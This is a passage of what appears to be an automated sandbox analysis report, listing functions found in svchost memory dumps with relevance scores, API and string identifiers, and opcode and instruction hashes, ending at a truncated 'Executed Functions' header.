                                                                          • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                          Function 00000195DD5C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                          Function 00000195DD5C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                          Function 00000195DD5C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                          Function 00000195DD5CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                          Function 00000195DD5C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
                                                                          Function 00000195DD5C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                          Function 00000195DD5D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                          Function 00000195DD5A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                          Function 00000195DD59F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                          Function 00000195DD5CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                          • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                          • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                          Function 00000195DD5CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                          Function 00000195DD59A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                          Function 00000195DD598405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                          Function 00000195DD5983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                          Function 00000195DD5D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                          • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                          • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                          Function 00000195DD5C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                          Function 00000195DD5D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                          • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                          • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                          Function 00000195DD5C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                          Function 00000195DD5C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                          • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                          • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                          Function 00000195DD599E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                          Function 00000195DD5C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                          • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                          • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                          Function 00000195DD5D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                          Function 00000195DD5C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                          Function 00000195DD597356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                          Function 00000195DD5973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                          Function 00000195DD5C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                          Function 00000195DD5C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 2cb59b5cb5821d9a8e55ce1da8b0343498eb188679990e79d0fc3b99dd601316
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 63E09235601A0886EB058FE2D82838A36E2FB8DF06F04C024C90907751DF7D84DAC760

                                                                          Executed Functions

                                                                          Function 000001160CA91628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
